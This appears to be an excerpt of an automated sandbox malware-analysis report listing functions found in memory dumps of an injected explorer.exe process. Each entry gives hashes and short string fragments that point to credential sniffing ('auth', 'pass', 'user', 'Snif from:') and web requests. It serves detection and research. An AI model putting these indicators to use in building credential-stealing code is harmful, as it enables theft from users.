                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $.$e$n$v
                                                                                            • API String ID: 0-1849617553
                                                                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                            • Instruction ID: ed9a32949cafd070be9a7ac4d8b1e1c99783e70984ae01e6c0c0dcc6a930c805
                                                                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                            • Instruction Fuzzy Hash: 03718F31618A498FD758DFA8C4957AAB7F1FF98304F00062FE44AC7261EF71E9458B85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F416C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                            • API String ID: 0-1970020201
                                                                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                            • Instruction ID: 11cd6ab6ad729e24a4fb2f8261049aa128533b84796788b0051ba53fc960bf6a
                                                                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                            • Instruction Fuzzy Hash: 17514CB0918B4C8BDB54EFA4D044AEEB7F1FF58300F40462E989AE7215EF709645CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098AC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                            • API String ID: 0-1970020201
                                                                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                            • Instruction ID: 6fbaf7ca3a34ee00d1c27a9cee61b2b3531708ac20947bbbcc938cfad6a345ad
                                                                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                            • Instruction Fuzzy Hash: 16514AB0918B4C8BDB55DFA4C455BEEB7E1FF58300F40462EA49AE7254EF30A5418B89
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41786F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4$\$dll$ion.$vers
                                                                                            • API String ID: 0-1610437797
                                                                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                            • Instruction ID: 6344fe1b3071b31b71c7ff325dd1e052e7d430bada88b9773c3bc2552df0331c
                                                                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                            • Instruction Fuzzy Hash: 05417F30618B888BDBA5EF2498457EBB7E4FB98341F40462E988EC7241EF70D605C782
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098B86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4$\$dll$ion.$vers
                                                                                            • API String ID: 0-1610437797
                                                                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                            • Instruction ID: b786f01cadd3eeeca6ffeae1de1107f9187e32ee16da4c6d3d2e5e48d12fa233
                                                                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                            • Instruction Fuzzy Hash: 20416034218B4C8BCBA9EF2498557EA73E4FB98301F51462E989EC7241EF30D945C782
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F4194B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 32.d$cli.$dll$sspi$user
                                                                                            • API String ID: 0-327345718
                                                                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                            • Instruction ID: f028fd180747872a4c7afe4babb9b4b4ec7188e577647273d45a2e73ae13b0fc
                                                                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                            • Instruction Fuzzy Hash: 91415A31A18E0D8FDB94EF6880A47AE77E1FB58310F84016AEC0AE7312DA75D5418B86
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098D4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 32.d$cli.$dll$sspi$user
                                                                                            • API String ID: 0-327345718
                                                                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                            • Instruction ID: 36fe9db9c018a291e10e86efc059b2397b20d551616d371c7191fb505cf2eb7d
                                                                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                            • Instruction Fuzzy Hash: F9416A31A19F0D8FCB89EF6880A57AD73E5FB68305F51416FA80AD7304DA30D9808B82
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F417432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$el32$h$kern
                                                                                            • API String ID: 0-4264704552
                                                                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                            • Instruction ID: 918077e276c6948420a55d6cd4c1139090bbc2b5a7364cd862b5f19c46483446
                                                                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                            • Instruction Fuzzy Hash: A1417F70608B488FD7A9DF2984843ABBBE1FB98300F504A6F989EC3656DB70D545CB85
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098B432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$el32$h$kern
                                                                                            • API String ID: 0-4264704552
                                                                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                            • Instruction ID: b46b95bf0de0b72901ba63c1a3dbc0c0368e7c9ebd89e92c4d32ab2fb787cd72
                                                                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                            • Instruction Fuzzy Hash: 06418270608B4D8FD799DF28C4A53AAB7E1FB98340F144A2FA49EC3265DB70D945CB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41E0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Snif$f fr$om:
                                                                                            • API String ID: 0-3434893486
                                                                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                            • Instruction ID: 9fc475f276079850749e97487467f168d8ea3c48d0f971a35a2806d85bb5f7ac
                                                                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                            • Instruction Fuzzy Hash: 8E31163151CB485FD75ADF29C0846EAB7D4FB94300F90492EE89BC7252EE74A649CB43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 109920B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Snif$f fr$om:
                                                                                            • API String ID: 0-3434893486
                                                                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                            • Instruction ID: 87407146408d1359b81fe67c8f29fd990011dddb4c3d2471c47449d22521e960
                                                                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                            • Instruction Fuzzy Hash: C531CF7551CB886FD71ADB28C4957DAB7D4FB84300F50491EE4ABC7291EE30A54ACB42
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41E0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Snif$f fr$om:
                                                                                            • API String ID: 0-3434893486
                                                                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                            • Instruction ID: d06c96f7c402d4b5f864fa76466c253012f19a394890b74447008049f7460088
                                                                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                            • Instruction Fuzzy Hash: 3631F671518B485FD759DF29C4846EAB7D4FB94300F80492FE89BC3252EE78E649CA43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 109920C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $Snif$f fr$om:
                                                                                            • API String ID: 0-3434893486
                                                                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                            • Instruction ID: a695cd76d8408200d8a4369ee019b4964d30246d3bc47d16dd33acbb98bdf7ed
                                                                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                            • Instruction Fuzzy Hash: ED31E17151CB486FD71ADB28C4956EAB7D4FB94300F40491EE4ABC3295EE30F506CA43
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F419FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                            • API String ID: 0-3136806129
                                                                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                            • Instruction ID: b2986033188b4e8d4d67bd4ab1c82c0e39182a6b0233ac008c156c931a279b85
                                                                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                            • Instruction Fuzzy Hash: 4D317C71218B184FCB84EF6A9494BAAB7E1FF98200F84467E984ACB216DF38D545C752
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098DFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                            • API String ID: 0-3136806129
                                                                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                            • Instruction ID: e3e32493aa240539298e719d8907c94b36e906b601fcc346440a541db0de113d
                                                                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                            • Instruction Fuzzy Hash: E5317E74118B488FC785EF6884A6BAAB7E1FBD8300F84466EA48ACB354DF30D945C752
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F419FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                            • API String ID: 0-3136806129
                                                                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                            • Instruction ID: dcd591405cf650def71695c4afba940d5be38df8a2b6af4dd9bf3e9312d38cf5
                                                                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                            • Instruction Fuzzy Hash: 4F319E71218B184FC784EF699494BAAB7E1FFD8300F84467E984ACB256DF38D545C742
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 1098DFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .dll$chro$hild$me_c
                                                                                            • API String ID: 0-3136806129
                                                                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                            • Instruction ID: 74e1fa42cd55b0eeb8e034ebad03a4e6b8cc0dbbea084cc86b8b2a7ab43c474a
                                                                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                            • Instruction Fuzzy Hash: 65319E74118B088FC785DF6884A5BAAB7E1FFD8300F84466EA48ACB354DF30D945CB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41C8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 0-319646191
                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction ID: ddd6c0d53e7dccb81a1fdc2688574aafe15266b1a505f60e2df9169482622b10
                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction Fuzzy Hash: 5E31CE71624B1C8BCB54EFA9D8847EEBBE4FB58214F80022BD84ED7241DE788645C799
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 109908C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 0-319646191
                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction ID: 4738089a490288c51d24317769f3375b9ed05e86f4cbc7f74027222b147a5320
                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                            • Instruction Fuzzy Hash: 6A31BD31714A4C8FCB45EFA8C8957EEBBE1FB98214F40422EE45ED7240DE789A45C789
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41C8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 0-319646191
                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction ID: e4c0aa1c55b59a063b7775834de73d9e9650340467098d2becfc901d6dd59b0e
                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction Fuzzy Hash: 3A21BF70624B1C8BCB54EFA9C8847EEBBE4FB58204F80422FD85AD7241DE7886458799
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 109908BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                            • API String ID: 0-319646191
                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction ID: 8a50974f14388e31956931024a452ce0c9999615e063ab3e57cae219b203452b
                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                            • Instruction Fuzzy Hash: 6321E430610A4C8FCB45EFA8C8957EDBBE5FF58214F40422EE45AD7240DF749A45C789
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41DE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$l$l$t
                                                                                            • API String ID: 0-168566397
                                                                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                            • Instruction ID: 6ca1e53101ef5be9547298f6fca1eec2e520faa9e76a0d64a01320fc1dc1dafc
                                                                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                            • Instruction Fuzzy Hash: 05217A70A24B1D9BDB48EFA9D0447AEBAF0FB58314F90462ED449D3601DB789591CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41DE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$l$l$t
                                                                                            • API String ID: 0-168566397
                                                                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                            • Instruction ID: 709aa9138dc722b98ad62ac3377a095190ea991fb9326573388b7397eb5b98c7
                                                                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                            • Instruction Fuzzy Hash: 15218B70A24B1D9BDB48EFA9D0447EEBBF0FB18314F90462ED449D3601DB789551CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 10991E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$l$l$t
                                                                                            • API String ID: 0-168566397
                                                                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                            • Instruction ID: 97a14e5d7d3b54499e44a597a96c2e3a5357057fe497238878453013226737c5
                                                                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                            • Instruction Fuzzy Hash: B0218B74A24A0E9FDB48EFA8C0557AEBAF0FF58310F50462EE009E3600DB74A591CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 10991E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$l$l$t
                                                                                            • API String ID: 0-168566397
                                                                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                            • Instruction ID: ec8a0aae41f86e98b6ef3ad665ac7d167f27ff2b1b3f56cc43ed6c22e7bb00d2
                                                                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                            • Instruction Fuzzy Hash: AB217C74A24A0D9BDB48EFA8D0557EEBBF1FF58314F50462EE049E3600DB74A591CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0F41DFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2954106401.000000000F380000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F380000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_f380000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: auth$logi$pass$user
                                                                                            • API String ID: 0-2393853802
                                                                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                            • Instruction ID: 3dc527a80f3c6ca900376af73786082304731d146c8d15ae0bc12477ba753b2b
                                                                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                            • Instruction Fuzzy Hash: AC21AE30624B0D8BCB45DF9998806EEB7F1EF88344F40461AD80AEB345D7B8E9148BD2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 10991FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000009.00000002.2955426325.00000000108F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 108F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_9_2_108f0000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: auth$logi$pass$user
                                                                                            • API String ID: 0-2393853802
                                                                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
